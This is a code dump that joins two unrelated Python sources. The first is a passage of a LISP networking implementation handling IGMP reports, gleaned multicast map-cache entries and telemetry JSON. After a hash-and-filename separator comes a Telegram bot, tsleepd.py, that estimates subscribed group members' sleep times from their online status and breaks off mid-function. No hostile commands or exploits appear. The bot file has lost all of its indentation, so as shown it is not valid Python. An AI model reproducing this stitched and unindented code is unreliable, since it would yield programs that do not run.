        d = packet.inner_dest
        packet.inner_dest = packet.inner_source
        packet.inner_source = d

    #
    # Fix up IP length field.
    #
    offset = 2 if packet.inner_version == 4 else 4
    ip_length = 20 + length if packet.inner_version == 4 else length
    length_field = struct.pack("H", socket.htons(ip_length))
    header = header[0:offset] + length_field + header[offset + 2::]

    #
    # Recompute IPv4 header checksum.
    #
    if packet.inner_version == 4:
        zero_checksum = struct.pack("H", 0)
        header = header[0:10] + zero_checksum + header[12::]
        header = lisp_ip_checksum(header[0:20]) + header[20::]

    packet.packet = header + trace_pkt
    return (True)
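#
# lisp_allow_gleaning
#
# Check the configured glean-mapping policies. Returns the 3-tuple
# (allow-gleaning, rloc-probe, igmp-query) for the first matching policy,
# or (False, False, False) when nothing matches.
#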
def lisp_allow_gleaning(eid, group, rloc):
    if lisp_glean_mappings == []: return (False, False, False)

    for entry in lisp_glean_mappings:
        if entry.has_key("instance-id"):
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if iid < low or iid > high: continue

        if entry.has_key("eid-prefix"):
            e = copy.deepcopy(entry["eid-prefix"])
            e.instance_id = eid.instance_id
            if eid.is_more_specific(e) == False: continue

        if entry.has_key("group-prefix"):
            if group == None: continue
            g = copy.deepcopy(entry["group-prefix"])
            g.instance_id = group.instance_id
            if group.is_more_specific(g) == False: continue

        if entry.has_key("rloc-prefix"):
            if (rloc != None and
                rloc.is_more_specific(entry["rloc-prefix"]) == False): continue

        return (True, entry["rloc-probe"], entry["igmp-query"])

    return (False, False, False)
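#
# lisp_build_gleaned_multicast
#
# Create or update a gleaned (*, G) map-cache entry, adding or refreshing
# an RLE node for the source EID with its translated RLOC and port.
#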
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    group_str = geid.print_address()
    seid_str = seid.print_address_no_iid()
    s = green("{}".format(seid_str), False)
    e = green("(*, {})".format(group_str), False)
    r = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Look up (*, G) map-cache entry; create one if not found.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if mc == None:
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(e))

    #
    # Find the RLE node for this source EID, if one exists.
    #
    rloc_entry = rle = rle_node = None
    if mc.rloc_set != []:
        rloc_entry = mc.rloc_set[0]
        if rloc_entry.rle:
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if node.rloc_name != seid_str: continue
                rle_node = node
                break

    #
    # Create RLOC entry, RLE, and RLE node as needed.
    #
    if rloc_entry == None:
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()

    if rle == None:
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle

    if rle_node == None:
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_str
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
    elif (rloc.is_exact_match(rle_node.address) == False or
        port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))

    #
    # Store or refresh the translated RLOC and port in the RLE node.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Remember group membership for this source EID when learned via IGMP.
    #
    if igmp:
        seid_name = seid.print_address()
        if lisp_gleaned_groups.has_key(seid_name) == False:
            lisp_gleaned_groups[seid_name] = {}
        lisp_gleaned_groups[seid_name][group_str] = lisp_get_timestamp()
#
# lisp_remove_gleaned_multicast
#
# Remove a source EID's RLE node from a gleaned (*, G) map-cache entry,
# deleting the entry when no RLE nodes remain.
#
def lisp_remove_gleaned_multicast(seid, geid):

    #
    # Look up map-cache entry and its RLE.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if mc == None: return

    rle = mc.rloc_set[0].rle
    if rle == None: return

    seid_str = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if rle_node.rloc_name == seid_str:
            found = True
            break
    if found == False: return

    #
    # Remove the RLE node and rebuild the forwarding list.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_name = seid.print_address()
    s = green("{}".format(seid_name), False)
    e = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(e, s))

    #
    # Forget group membership for this source EID.
    #
    if lisp_gleaned_groups.has_key(seid_name):
        if lisp_gleaned_groups[seid_name].has_key(group_str):
            lisp_gleaned_groups[seid_name].pop(group_str)

    #
    # Remove the map-cache entry when no more RLEs exist.
    #
    if rle.rle_nodes == []:
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(e))
#
# lisp_change_gleaned_multicast
#
# Update the RLOC and port of every gleaned group joined by this source EID.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
    seid_name = seid.print_address()
    if lisp_gleaned_groups.has_key(seid_name) == False: return

    for group in lisp_gleaned_groups[seid_name]:
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
igmp_types = {17: "IGMP-query", 18: "IGMPv1-report", 19: "DVMRP",
    20: "PIMv1", 22: "IGMPv2-report", 23: "IGMPv2-leave",
    30: "mtrace-response", 31: "mtrace-request", 34: "IGMPv3-report"}

lisp_igmp_record_types = {1: "include-mode", 2: "exclude-mode",
    3: "change-to-include", 4: "change-to-exclude", 5: "allow-new-source",
    6: "block-old-sources"}
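#
# lisp_process_igmp_packet
#
# Parse an IGMP report or leave. Returns True for an IGMP query, [] when
# there is nothing to register, or an array of [source, group, join-leave]
# entries describing IGMPv1/v2/v3 membership changes.
#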
def lisp_process_igmp_packet(packet):
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = bold("from {}".format(source.print_address_no_iid()), False)

    r = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
        lisp_format_packet(packet)))

    #
    # Jump over the IP header; IHL is in 32-bit words.
    #
    header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4

    igmp = packet[header_offset::]
    igmp_type = struct.unpack("B", igmp[0])[0]

    #
    # Get group address from the message.
    #
    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if igmp_type == 17:
        lprint("IGMP Query for group {}".format(group_str))
        return (True)

    #
    # Only IGMPv1/v2 reports, IGMPv2 leaves, and IGMPv3 reports supported.
    #
    valid = igmp_type in (0x12, 0x16, 0x17, 0x22)
    if valid == False:
        type_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            igmp_types.has_key(igmp_type) else igmp_type
        lprint("IGMP type {} not supported".format(type_str))
        return ([])

    if len(igmp) < 8:
        lprint("IGMP message too small")
        return ([])

    #
    # IGMPv2 leave.
    #
    if igmp_type == 0x17:
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return ([[None, group_str, False]])

    #
    # IGMPv1/v2 join.
    #
    if igmp_type in (0x12, 0x16):
        lprint("IGMPv{} join (*, {})".format(1 if (igmp_type == 0x12) else 2,
            bold(group_str, False)))

        #
        # Suppress registration for link-local groups.
        #
        if group_str.find("224.0.0.") != -1:
            lprint("Suppress registration for link-local groups")
        else:
            return ([[None, group_str, True]])
        return ([])

    #
    # Process IGMPv3 report. The address field just parsed is the group
    # record count.
    #
    record_count = group.address
    igmp = igmp[8::]

    record_format = "BBHI"
    record_size = struct.calcsize(record_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    #
    # Traverse each group record.
    #
    group_list = []
    for i in range(record_count):
        if len(igmp) < record_size: return
        record_type, aux, source_count, addr = struct.unpack(record_format,
            igmp[:record_size])

        igmp = igmp[record_size::]

        if lisp_igmp_record_types.has_key(record_type) == False:
            lprint("Invalid record type {}".format(record_type))
            continue

        record_type_str = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(addr)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format(
            record_type_str, group_str, source_count))

        #
        # Decide join or leave from the record type and source count.
        #
        joinleave = False
        if record_type in (1, 5): joinleave = True
        if record_type in (2, 4) and source_count == 0: joinleave = True
        jl_str = "join" if joinleave else "leave"

        #
        # Suppress registration for link-local groups.
        #
        if group_str.find("224.0.0.") != -1:
            lprint("Suppress registration for link-local groups")
            continue

        #
        # (*, G) case.
        #
        if source_count == 0:
            group_list.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(jl_str, False),
                bold(group_str, False)))

        #
        # (S, G) case: traverse each source record.
        #
        for j in range(source_count):
            if len(igmp) < source_size: return
            addr = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(addr)
            source_str = source.print_address_no_iid()
            group_list.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(jl_str,
                green(source_str, False), bold(group_str, False)))
            igmp = igmp[source_size::]

    #
    # Return array of [source, group, join-leave] entries.
    #
    return (group_list)
# Global gleaned-group EID address, reused by lisp_glean_map_cache().
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
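#
# lisp_glean_map_cache
#
# Glean a map-cache entry for a source EID and its translated RLOC/port,
# then glean (*, G) state from an optional IGMP report.
#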
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):

    #
    # Look up the source EID in the map-cache. If an entry exists with the
    # same RLOC and port, just refresh it.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if mc and len(mc.rloc_set) != 0:
        mc.last_refresh_time = lisp_get_timestamp()

        cached_rloc = mc.rloc_set[0]
        old_rloc = cached_rloc.rloc
        old_port = cached_rloc.translated_port
        rloc_change = (old_rloc.is_exact_match(rloc) == False or
            old_port != encap_port)

        if rloc_change:
            e = green(seid.print_address(), False)
            r = red(rloc.print_address_no_iid() + ":" + str(encap_port),
                False)
            lprint("Change gleaned EID {} to RLOC {}".format(e, r))
            cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
    else:
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        e = green(seid.print_address(), False)
        r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
        mc.add_cache()

    #
    # Create a new RLOC entry when the RLOC or port changed.
    #
    if rloc_change:
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.rloc_set = [rloc_entry]
        mc.build_best_rloc_set()

    #
    # All done unless an IGMP report needs processing.
    #
    if igmp == None: return

    #
    # Glean (*, G) state from the IGMP report.
    #
    lisp_geid.instance_id = seid.instance_id

    group_list = lisp_process_igmp_packet(igmp)
    if type(group_list) == bool: return

    for source, group, joinleave in group_list:
        if source != None: continue

        #
        # Only (*, G) entries are gleaned; check policy for each group.
        #
        lisp_geid.store_address(group)
        allow, _, _ = lisp_allow_gleaning(seid, lisp_geid, rloc)
        if allow == False: continue

        if joinleave:
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
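#
# Telemetry helpers. A telemetry JSON body has type "telemetry", sub-type
# "timestamps", and itr-in/itr-out/etr-in/etr-out fields that start as "?"
# and are filled in as the packet transits each node.
#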
def lisp_is_json_telemetry(json_string):
    try:
        json_data = json.loads(json_string)
        if type(json_data) != dict: return (None)
    except:
        lprint("Could not decode telemetry json: {}".format(json_string))
        return (None)

    if json_data.has_key("type") == False: return (None)
    if json_data.has_key("sub-type") == False: return (None)
    if json_data["type"] != "telemetry": return (None)
    if json_data["sub-type"] != "timestamps": return (None)
    return (json_data)
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
    iiiiIIiI = lisp_is_json_telemetry(json_string)
    if (iiiiIIiI == None): return (json_string)

    if (iiiiIIiI["itr-in"] == "?"): iiiiIIiI["itr-in"] = ii
    if (iiiiIIiI["itr-out"] == "?"): iiiiIIiI["itr-out"] = io
    if (iiiiIIiI["etr-in"] == "?"): iiiiIIiI["etr-in"] = ei
    if (iiiiIIiI["etr-out"] == "?"): iiiiIIiI["etr-out"] = eo
    json_string = json.dumps(iiiiIIiI)
    return (json_string)
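
# Illustrative sketch (not part of the original source): stamping ITR
# timestamps into a telemetry record. Fields passed as "?" stay unstamped so
# a later hop can fill them; non-telemetry strings pass through unchanged.
def _demo_encode_telemetry():
    record = json.dumps({
        "type": "telemetry", "sub-type": "timestamps",
        "itr-in": "?", "itr-out": "?", "etr-in": "?", "etr-out": "?"
    })
    stamped = lisp_encode_telemetry(record, ii="1700000000.0", io="1700000000.1")
    return (lisp_decode_telemetry(stamped))  # itr fields stamped, etr still "?"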
def lisp_decode_telemetry(json_string):
    iiiiIIiI = lisp_is_json_telemetry(json_string)
    if (iiiiIIiI == None): return ({})
    return (iiiiIIiI)
def lisp_telemetry_configured():
    if ("telemetry" not in lisp_json_list): return (None)

    II11iii = lisp_json_list["telemetry"].json_string
    if (lisp_is_json_telemetry(II11iii) == None): return (None)

    return (II11iii)
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
tsleepd.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Trusted Sleep Monitor Bot
This bot monitors group members' sleep time using online status.
Threads:
* tg-cli
* Event: set online state
* Telegram API polling
* /status - List sleeping status
* /average - List statistics about sleep time
* /help - About the bot
* /start - Describe how to use
* /settz - Set user timezone
* /subscribe - Add user to watchlist
* /unsubscribe - Remove user from watchlist
* Main
* SQLite
* Member
* Basic info
* Subscribed?
* Timezone
* Sleep start/end events
'''
import os
import re
import sys
import math
import time
import json
import queue
import signal
import sqlite3
import logging
import gettext
import datetime
import requests
import operator
import functools
import itertools
import threading
import collections
import concurrent.futures
import pytz
import tgcli
import humanizetime
re_zoneloc = re.compile(r'([+-]\d{4,7})([+-]\d{4,7})')
logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO)
logger_botapi = logging.getLogger('botapi')
executor = concurrent.futures.ThreadPoolExecutor(5)
HSession = requests.Session()
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
# Cli bot
tg_mktime = lambda s: time.mktime(time.strptime(s, '%Y-%m-%d %H:%M:%S'))
def handle_tg_update(obj):
try:
if obj.get('event') in ('message', 'service'):
#update_user(obj['from'])
user_event(obj['from'], obj['date'])
if 'when' in obj['from']:
user_event(obj['from'], tg_mktime(obj['from']['when']))
elif obj.get('event') == 'online-status':
#update_user(obj['user'])
try:
# it's localtime
user_event(obj['user'], tg_mktime(obj['when']))
except ValueError:
pass
except Exception:
logging.exception("can't handle message event")
def tg_get_members(chat):
chattype = chat.get('type')
# To ensure the id is valid
TGCLI.cmd_dialog_list()
if chattype == 'group':
peername = 'chat#id%d' % (-chat['id'])
obj = TGCLI.cmd_chat_info(peername)
return obj['members']
elif chattype == 'supergroup':
peername = 'channel#id%d' % (-chat['id'] - 1000000000000)
members = items = TGCLI.cmd_channel_get_members(peername, 100)
dcount = 100
while items:
items = TGCLI.cmd_channel_get_members(peername, 100, dcount)
members.extend(items)
dcount += 100
return members
else:
return
# API bot
class BotAPIFailed(Exception):
pass
def async_func(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
def func_noerr(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception:
logger_botapi.exception('Async function failed.')
executor.submit(func_noerr, *args, **kwargs)
return wrapped
def bot_api(method, **params):
for att in range(3):
try:
req = HSession.get(('https://api.telegram.org/bot%s/' %
CFG.apitoken) + method, params=params, timeout=45)
retjson = req.content
ret = json.loads(retjson.decode('utf-8'))
break
except Exception as ex:
            if att < 2:  # sleep and retry; the last of the three attempts re-raises
time.sleep((att + 1) * 2)
else:
raise ex
if not ret['ok']:
raise BotAPIFailed(repr(ret))
return ret['result']
@async_func
def sendmsg(text, chat_id, reply_to_message_id=None):
text = text.strip()
if not text:
logger_botapi.warning('Empty message ignored: %s, %s' % (chat_id, reply_to_message_id))
return
logger_botapi.info('sendMessage(%s): %s' % (len(text), text[:20]))
if len(text) > 2000:
text = text[:1999] + '…'
reply_id = reply_to_message_id
if reply_to_message_id and reply_to_message_id < 0:
reply_id = None
return bot_api('sendMessage', chat_id=chat_id, text=text, reply_to_message_id=reply_id)
def updatebotinfo():
global CFG
d = bot_api('getMe')
CFG['username'] = d.get('username')
CFG['nickname'] = d.get('first_name')
def getupdates():
global CFG
while 1:
try:
updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10)
except Exception:
logger_botapi.exception('Get updates failed.')
continue
if updates:
logger_botapi.debug('Messages coming.')
CFG['offset'] = updates[-1]["update_id"] + 1
for upd in updates:
MSG_Q.put(upd)
time.sleep(.2)
def parse_cmd(text: str):
t = text.strip().replace('\xa0', ' ').split(' ', 1)
if not t:
return (None, None)
cmd = t[0].rsplit('@', 1)
if len(cmd[0]) < 2 or cmd[0][0] != "/":
return (None, None)
if len(cmd) > 1 and 'username' in CFG and cmd[-1] != CFG['username']:
return (None, None)
expr = t[1] if len(t) > 1 else ''
return (cmd[0][1:], expr.strip())
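# Illustrative sketch (not part of the original source): how parse_cmd()
# splits incoming text. The '@botname' check only fires for commands carrying
# an explicit @-suffix and assumes CFG['username'] was set by updatebotinfo().
def _demo_parse_cmd():
    assert parse_cmd('/status all') == ('status', 'all')
    assert parse_cmd('hello') == (None, None)  # not a command
    assert parse_cmd('/s') == ('s', '')        # bare command, empty argument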
def handle_api_update(d):
logger_botapi.debug('Msg arrived: %r' % d)
if 'message' in d:
try:
msg = d['message']
update_user(msg['from'])
user_event(msg['from'], msg['date'])
cmd, expr = parse_cmd(msg.get('text', ''))
if cmd in COMMANDS:
logger_botapi.info('Command: /%s %s' % (cmd, expr))
COMMANDS[cmd](expr, msg['chat']['id'], msg['message_id'], msg)
elif msg['chat']['type'] == 'private':
sendmsg(_('Invalid command. Send /help for help.'), msg['chat']['id'], msg['message_id'])
else:
update_user_group(msg['from'], msg['chat'])
except Exception:
logger_botapi.exception('Failed to process a message.')
# Processing
_fill_lock = threading.RLock()  # was previously undefined here; mirrors the lazy-fill lock in pytz.lazy
class _TimezoneLocationDict(pytz.LazyDict):
"""Map timezone to its principal location."""
def __getitem__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data[key]
def _convert_coordinates(self, match):
lat_text, lon_text = match.groups()
if len(lat_text) < 7:
lat = int(lat_text[:-2]) + int(lat_text[-2:]) / 60
else:
lat = int(lat_text[:-4]) + int(lat_text[-4:-2]) / 60 + int(lat_text[-2:]) / 3600
if len(lon_text) < 7:
lon = int(lon_text[:-2]) + int(lon_text[-2:]) / 60
else:
lon = int(lon_text[:-4]) + int(lon_text[-4:-2]) / 60 + int(lon_text[-2:]) / 3600
return (lat, lon)
def _fill(self):
data = {}
zone_tab = pytz.open_resource('zone.tab')
try:
for line in zone_tab:
line = line.decode('UTF-8')
if line.startswith('#'):
continue
code, coordinates, zone = line.split(None, 4)[:3]
match = re_zoneloc.match(coordinates)
if match:
data[zone] = self._convert_coordinates(match)
self.data = data
finally:
zone_tab.close()
timezone_location = _TimezoneLocationDict()
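# Illustrative sketch (not part of the original source): zone.tab rows look
# like "FR +4852+00220 Europe/Paris"; _convert_coordinates() turns the
# ISO 6709 coordinate string into decimal degrees, so lookups return
# (latitude, longitude) pairs.
def _demo_timezone_location():
    lat, lon = timezone_location['Europe/Paris']  # roughly (48.87, 2.33)
    return lat, lon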
def init_db():
global DB, CONN
DB = sqlite3.connect(CFG['database'])
DB.row_factory = sqlite3.Row
CONN = DB.cursor()
CONN.execute('CREATE TABLE IF NOT EXISTS users ('
'id INTEGER PRIMARY KEY,' # peer_id
'username TEXT,'
'first_name TEXT,'
'last_name TEXT,'
'subscribed INTEGER,'
'timezone TEXT'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS user_chats ('
'user INTEGER,'
'chat INTEGER,'
'PRIMARY KEY (user, chat),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS events ('
'user INTEGER,'
'time INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS sleep ('
'user INTEGER,'
'time INTEGER,'
'duration INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
users = {}
for row in CONN.execute('SELECT * FROM users'):
users[row['id']] = dict(row)
return users
def update_user_group(user, chat):
if chat['type'].endswith('group'):
uid = user.get('peer_id') or user['id']
CONN.execute('INSERT OR IGNORE INTO user_chats (user, chat) VALUES (?, ?)', (uid, chat['id']))
def update_user(user, subscribed=None, timezone=None):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE:
updkey = ''
updval = [user.get('username') or None, user.get('first_name', ''),
user.get('last_name')]
USER_CACHE[uid]['username'] = updval[0]
USER_CACHE[uid]['first_name'] = updval[1]
USER_CACHE[uid]['last_name'] = updval[2]
if subscribed is not None:
updkey += ', subscribed=?'
updval.append(subscribed)
USER_CACHE[uid]['subscribed'] = subscribed
if timezone:
updkey += ', timezone=?'
updval.append(timezone)
USER_CACHE[uid]['timezone'] = timezone
updval.append(uid)
CONN.execute('UPDATE users SET username=?, first_name=?, last_name=?%s WHERE id=?' % updkey, updval)
else:
USER_CACHE[uid] = user
timezone = USER_CACHE[uid]['timezone'] = timezone or CFG['defaulttz']
subscribed = USER_CACHE[uid]['subscribed'] = subscribed or 0
CONN.execute('REPLACE INTO users VALUES (?,?,?,?,?,?)',
(uid, user.get('username') or None, user.get('first_name', ''),
user.get('last_name'), subscribed, timezone))
def user_event(user, eventtime):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
# https://github.com/vysheng/tg/wiki/Scripting-notes
# > To check whether a user is online, update the contact list and
# > compare user_status["when"] with the current time. If the status
# > is in the future, the contact is online right now.
now = int(time.time())
if eventtime > now:
eventtime = now
CONN.execute('INSERT OR IGNORE INTO events (user, time) VALUES (?, ?)', (uid, eventtime))
def user_last_seen(user):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
res = CONN.execute('SELECT time FROM events WHERE '
'user = ? ORDER BY time DESC LIMIT 1', (uid,)).fetchone()
if res:
return res[0]
def hour_minutes(seconds, zpad=True):
m = round(seconds / 60)
h, m = divmod(m, 60)
if zpad:
return '%02d:%02d' % (h, m)
else:
return '%d:%02d' % (h, m)
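# Illustrative sketch (not part of the original source): seconds are rounded
# to whole minutes before being split into h:mm.
def _demo_hour_minutes():
    assert hour_minutes(27000) == '07:30'             # 7.5 hours, zero-padded
    assert hour_minutes(27000, zpad=False) == '7:30'  # same value, no padding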
def replace_dt_time(fromdatetime, seconds):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(seconds=seconds))
def replace_dt_hours(fromdatetime, hours):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(hours=hours))
def midnight_delta(fromdatetime, adjust=True):
fromtimestamp = fromdatetime.timestamp()
midnight = datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=fromdatetime.tzinfo)).timestamp()
delta = fromtimestamp - midnight
if adjust and delta > 43200:
return delta - 86400
else:
return delta
midnight_adjust = lambda delta: delta + 86400 if delta < 0 else delta
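# Illustrative sketch (not part of the original source): midnight_delta()
# measures seconds from local midnight, mapping times after 12:00 to a
# negative offset from the next midnight so bedtimes cluster around zero;
# midnight_adjust() maps the result back into [0, 86400) for display.
def _demo_midnight_delta():
    at_23 = pytz.utc.localize(datetime.datetime(2016, 1, 1, 23, 0))
    delta = midnight_delta(at_23)  # -3600: one hour before midnight
    return midnight_adjust(delta)  # 82800: 23:00 as seconds-of-day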
def tz_is_day(dt, tzname, lat=None, lon=None):
timezone = dt.tzinfo
offset = timezone.utcoffset(dt).total_seconds() / 240
clocktime = midnight_delta(dt, False) / 3600
if lat is None:
if tzname in timezone_location:
lat, lon = timezone_location[tzname]
elif 6 <= clocktime < 18:
return True
else:
return False
localtime = (clocktime + (lon-offset) / 15 + 24) % 24
a = 2 * math.pi * (dt.timetuple().tm_yday + localtime / 24) / 365
phi = 0.006918 - 0.399912 * math.cos(a) + 0.070257*math.sin(a) - \
0.006758 * math.cos(2*a) + 0.000907 * math.sin(2*a) - \
0.002697 * math.cos(3*a) + 0.001480 * math.sin(3*a)
latrad = math.radians(lat)
h0 = math.asin(math.cos(math.radians((localtime - 12) * 15)) *
math.cos(latrad) * math.cos(phi) + math.sin(latrad) * math.sin(phi))
return (h0 > 0)
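# Illustrative sketch (not part of the original source): tz_is_day() converts
# the zone's UTC offset to degrees (3600 s == 15 deg), estimates solar
# elevation from the zone's principal location, and falls back to a plain
# 06:00-18:00 clock rule when the zone has no entry in zone.tab.
def _demo_tz_is_day():
    noon = pytz.utc.localize(datetime.datetime(2016, 6, 21, 12, 0))
    return tz_is_day(noon, 'UTC')  # 'UTC' is not in zone.tab -> clock rule -> True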
def user_status(uid, events):
'''
Identify sleep time using rules as follows:
-24h 0 6 now
/=====================\ <- SELECT
. x-+-----------+----💤?
. | x-----+----💤?
. | | x 🌞?
. x-+--------x x| xx
. x-+-----------+--x
. xx| x------x x| xx
. | x x-------+-x
. x | x------+--x
. x | x-------x | 🌞?
x . | | 🌞?
. x | | x 🌞?
Legend:
x user event
. select boundary (last 24h)
- sleep duration
| cut window (0:00 ~ 6:00 local time)
💤 maybe sleeping
🌞 maybe awake
'''
start, interval = None, None
usertime = datetime.datetime.now(pytz.timezone(USER_CACHE[uid]['timezone']))
window = (replace_dt_time(usertime, CFG['cutwindow'][0]).timestamp(),
replace_dt_time(usertime, CFG['cutwindow'][1]).timestamp())
lasttime = None
left, right = None, None
complete = True
intervals = []
for _user, etime in events:
if lasttime:
intervals.append((etime - lasttime, lasttime))
lasttime = etime
if etime > window[1]:
right = etime
break
elif etime > window[1]:
if left:
intervals.append((etime - left, left))
lasttime = right = etime
break
elif etime < window[0]:
left = etime
elif left:
intervals.append((etime - left, left))
lasttime = etime
if etime > window[1]:
right = etime
break
else:
lasttime = etime
if intervals:
complete = right is not None
interval, start = max(intervals)
if interval > CFG['threshold']:
# offline for too long
start = interval = None
elif lasttime:
start = lasttime
elif left:
start = left
# else: pass
if interval is None and start and usertime.timestamp() - start > CFG['threshold']:
# also offline for too long
start = None
return start, interval, complete
def user_status_update(uid):
expires = time.time() - 86400
start, interval, complete = user_status(uid, CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.user = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires)))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(uid, start, interval))
return start, interval, complete
def group_status_update(chat):
expires = time.time() - 86400
uid = chat['id']
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' INNER JOIN user_chats ON events.user = user_chats.user'
' WHERE user_chats.chat = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
stats.sort(key=lambda x: (-x[2] if x[2] else 0, x[1] or float('inf'), x[0]))
return stats
def all_status_update():
expires = time.time() - 86400
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.time >= ? AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (expires,))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
CONN.execute('DELETE FROM events WHERE time < ?', (expires,))
CONN.execute('DELETE FROM sleep WHERE duration > ?', (CFG['threshold'],))
return stats
def update_group_members(chat):
members = None
try:
members = tg_get_members(chat)
except Exception:
pass
if members:
for m in members:
update_user_group(m, chat)
if 'when' in m:
user_event(m, tg_mktime(m['when']))
@functools.lru_cache(maxsize=100)
def db_getuidbyname(username):
if username.startswith('#'):
try:
return int(username[1:])
except ValueError:
return None
else:
uid = CONN.execute('SELECT id FROM users WHERE username LIKE ?', (username,)).fetchone()
if uid:
return uid[0]
def cmd_status(expr, chatid, replyid, msg):
'''/status [all|@username] - List sleeping status'''
if expr and expr[0] == '@':
